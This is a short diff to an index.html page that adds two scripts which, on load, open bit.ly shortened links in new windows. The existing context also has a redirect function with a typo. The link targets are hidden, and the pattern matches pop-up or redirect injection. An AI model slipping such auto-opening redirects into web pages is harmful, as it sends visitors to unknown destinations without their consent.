--- a/index.html
+++ b/index.html
@@ -5,6 +5,20 @@
 })()
 </script>
 
+<script type='text/javascript'>
+(function(){
+  //add this line for each website you want to open
+  window.open("https://bit.ly/3L4XqGk",'');
+})()
+</script>
+
+<script type='text/javascript'>
+(function(){
+  //add this line for each website you want to open
+  window.open("https://bit.ly/3PpMpBS",'');
+})()
+</script>
+
 <script>
 function redirect(){
 windows.open("https://bit.ly/3R6YUUy")
